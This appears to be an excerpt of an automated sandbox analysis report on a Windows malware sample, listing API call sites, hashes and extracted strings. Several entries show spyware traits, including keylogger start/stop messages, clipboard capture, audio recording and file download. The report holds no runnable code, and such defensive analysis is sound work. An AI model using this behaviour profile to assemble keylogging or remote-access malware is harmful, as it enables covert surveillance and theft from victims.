                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Window$SleepText$ForegroundLength
                                                                                        • String ID: [ $ ]
                                                                                        • API String ID: 3309952895-93608704
                                                                                        • Opcode ID: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
                                                                                        • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
                                                                                        • Opcode Fuzzy Hash: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
                                                                                        • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: SystemTimes$Sleep__aulldiv
                                                                                        • String ID:
                                                                                        • API String ID: 188215759-0
                                                                                        • Opcode ID: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
                                                                                        • Instruction ID: 72b4c32e7059473e424b83a6cc96647c38f9827b21069785d395d2d8421d6a64
                                                                                        • Opcode Fuzzy Hash: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
                                                                                        • Instruction Fuzzy Hash: B0113D7A5083456BD304FAB5CC85DEB7BACEAC4654F040A3EF54A82051FE68EA4886A5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                                                                        • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
                                                                                        • Opcode Fuzzy Hash: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                                                                        • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                                                                        • Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
                                                                                        • Opcode Fuzzy Hash: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                                                                        • Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
• GetLastError.KERNEL32(?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
Memory Dump Source
• Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• API String ID: 3177248105-0
• Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
• Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
• Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
• GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4B2
• ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4D7
• CloseHandle.KERNEL32(00000000,?,00000000,0040412F,00465E74), ref: 0041C4E5
Memory Dump Source
• Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
Similarity
• API ID: File$CloseCreateHandleReadSize
• API String ID: 3919263394-0
• Opcode ID: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
• Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
• Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
Uniqueness

Uniqueness Score: -1.00%

APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
  • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
• _UnwindNestedFrames.LIBCMT ref: 00439891
• ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
• CallCatchBlock.LIBVCRUNTIME ref: 004398C7
Memory Dump Source
• Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
Similarity
• API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
• API String ID: 2633735394-0
• Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
• Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
• Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetSystemMetrics.USER32(0000004C), ref: 004193F0
• GetSystemMetrics.USER32(0000004D), ref: 004193F6
• GetSystemMetrics.USER32(0000004E), ref: 004193FC
• GetSystemMetrics.USER32(0000004F), ref: 00419402
Memory Dump Source
• Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
Similarity
• API ID: MetricsSystem
• API String ID: 4116985748-0
• Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
• Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
• Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
Uniqueness

Uniqueness Score: -1.00%

APIs
• ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
• ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
• ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
  • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
• ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
Memory Dump Source
• Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
Similarity
• API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
• API String ID: 1761009282-0
• Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
• Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
• Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F
Uniqueness

Uniqueness Score: -1.00%

APIs
• WideCharToMultiByte.KERNEL32(000000FF,00000000,00000006,00000001,?,?,00000000,?,00000000,?,?,00000000,00000006,?,?,?), ref: 00449F0F
• GetLastError.KERNEL32 ref: 00449F2B
Memory Dump Source
• Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
Similarity
• API ID: ByteCharErrorLastMultiWide
• String ID: PkGNG
• API String ID: 203985260-263838557
• Opcode ID: 8762d6c9eb8cd6bb849928aa97b0b7335ecf1b8cbe6ccd937ce160abea437523
• Instruction ID: 5218313022fb824330162c1b3e1e252a07855a0508c927524b2412b0d5c8e50b
• Instruction Fuzzy Hash: A531F831600205EBEB21EF56C845BAB77A8DF55711F24416BF9048B3D1DB38CD41E7A9
Uniqueness

Uniqueness Score: -1.00%

APIs
• SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418ABE
  • Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
• SHCreateMemStream.SHLWAPI(00000000), ref: 00418B0B
  • Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
  • Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
Memory Dump Source
• Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
Similarity
• API ID: Stream$GdipImage$Create$DisposeFromLoadSave
• String ID: image/jpeg
• API String ID: 1291196975-3785015651
• Opcode ID: 8883413a241ecd6daa78ef1183ec8e175d09e4f7b2134cb7e7ff04ec22b53db4
• Instruction ID: 71c7567624fb1f0fb67e5b365d5baafb3eed0516d04e2b9615b8e3d4f66a2876
• Instruction Fuzzy Hash: 13317F71504300AFC301EF65CC84DAFB7E9FF8A704F00496EF985A7251DB7999448BA6
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
• __Init_thread_footer.LIBCMT ref: 0040B797
Memory Dump Source
• Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
Similarity
• API ID: Init_thread_footer__onexit
• String ID: [End of clipboard]$[Text copied to clipboard]
• API String ID: 1881088180-3686566968
• Opcode ID: 324d16734c00dd0800ed2bf7710d2d62d1c0e2a3751a5b5203366b445deaa986
• Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
• Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
Memory Dump Source
• Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
Similarity
• String ID: ACP$OCP
• API String ID: 0-711371036
• Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
• Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
• Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
Uniqueness

Uniqueness Score: -1.00%

APIs
• WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB6E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B7DB
• GetLastError.KERNEL32 ref: 0044B804
Memory Dump Source
• Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: PkGNG
• API String ID: 442123175-263838557
• Opcode ID: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
• Instruction ID: 56933c973e2243a1a9a6e47b5ff38ff3048756f5123006952a384074424e161b
• Instruction Fuzzy Hash: 12319331A00619DBCB24CF59CD809DAB3F9EF88311F1445AAE509D7361D734ED81CB68
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB8E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B6ED
                                                                                        • GetLastError.KERNEL32 ref: 0044B716
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastWrite
                                                                                        • String ID: PkGNG
                                                                                        • API String ID: 442123175-263838557
                                                                                        • Opcode ID: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
                                                                                        • Instruction ID: 12ef57d8ab414bd2a6c5914f5c8b73f84ca543b1ee1fc2f1adbb6bb6aefc8993
                                                                                        • Opcode Fuzzy Hash: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
                                                                                        • Instruction Fuzzy Hash: 6C21B435600219DFCB14CF69C980BE9B3F8EB48302F1044AAE94AD7351D734ED81CB64
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418BAA
                                                                                          • Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
                                                                                        • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00418BCF
                                                                                          • Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
                                                                                          • Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                        • String ID: image/png
                                                                                        • API String ID: 1291196975-2966254431
                                                                                        • Opcode ID: 6411a8012ecf1a64a1773f4eaa23e3f4fcdf1f742ac8238d8550c3e8c78666f9
                                                                                        • Instruction ID: c6f894421d6f6d4ca6915e56eba1d7ff3797fde04a376feef2065c2e579c4a83
                                                                                        • Opcode Fuzzy Hash: 6411a8012ecf1a64a1773f4eaa23e3f4fcdf1f742ac8238d8550c3e8c78666f9
                                                                                        • Instruction Fuzzy Hash: 30219371204211AFC705EB61CC88CBFBBADEFCA754F10092EF54693161DB399945CBA6
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                                                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                        • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
                                                                                        Strings
                                                                                        • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LocalTime
                                                                                        • String ID: KeepAlive | Enabled | Timeout:
                                                                                        • API String ID: 481472006-1507639952
                                                                                        • Opcode ID: 23b0d405c7df8ea3eb93e7c73b3042e9bf9b9ce6517dcb05167bfa0c68009315
                                                                                        • Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
                                                                                        • Opcode Fuzzy Hash: 23b0d405c7df8ea3eb93e7c73b3042e9bf9b9ce6517dcb05167bfa0c68009315
                                                                                        • Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • Sleep.KERNEL32 ref: 00416640
                                                                                        • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: DownloadFileSleep
                                                                                        • String ID: !D@
                                                                                        • API String ID: 1931167962-604454484
                                                                                        • Opcode ID: 67dfb507ba3ddc82345b7865ce065edb943c59958e882518e560ee8acae80623
                                                                                        • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
                                                                                        • Opcode Fuzzy Hash: 67dfb507ba3ddc82345b7865ce065edb943c59958e882518e560ee8acae80623
                                                                                        • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExistsFilePath
                                                                                        • String ID: alarm.wav$hYG
                                                                                        • API String ID: 1174141254-2782910960
                                                                                        • Opcode ID: 03e35b0c78ecaf780253322939ef9894f1bf68fcbaf7cdf3e29ba7f04c14b924
                                                                                        • Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
                                                                                        • Opcode Fuzzy Hash: 03e35b0c78ecaf780253322939ef9894f1bf68fcbaf7cdf3e29ba7f04c14b924
                                                                                        • Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                                                                          • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                        • CloseHandle.KERNEL32(?), ref: 0040B0B4
                                                                                        • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                        • String ID: Online Keylogger Stopped
                                                                                        • API String ID: 1623830855-1496645233
                                                                                        • Opcode ID: bec78cf3eedf1b186c8e89cd18ae9734a19b2f7b120e1a552bb6b5e0ab87ed89
                                                                                        • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
                                                                                        • Opcode Fuzzy Hash: bec78cf3eedf1b186c8e89cd18ae9734a19b2f7b120e1a552bb6b5e0ab87ed89
                                                                                        • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,73E85006,00000001,?,0043CE55), ref: 00448C24
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: String
                                                                                        • String ID: LCMapStringEx$PkGNG
                                                                                        • API String ID: 2568140703-1065776982
                                                                                        • Opcode ID: 6176356b550008225c45ed95f9c308570f022b01c1c57b82113652449518e224
                                                                                        • Instruction ID: 91dcaeff4e4508283399e99d6512adb219adb357de156da575c9a111b1dd59a7
                                                                                        • Opcode Fuzzy Hash: 6176356b550008225c45ed95f9c308570f022b01c1c57b82113652449518e224
                                                                                        • Instruction Fuzzy Hash: 3F016532500209FBCF029F90DC01EEE7F62EF08351F10452AFE0925161CA3A8971AB99
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • waveInPrepareHeader.WINMM(3BDDCCB0,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                                                                        • waveInAddBuffer.WINMM(3BDDCCB0,00000020,?,00000000,00401A15), ref: 0040185F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wave$BufferHeaderPrepare
                                                                                        • String ID: XMG
                                                                                        • API String ID: 2315374483-813777761
                                                                                        • Opcode ID: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                                                                        • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                                                        • Opcode Fuzzy Hash: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                                                                        • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
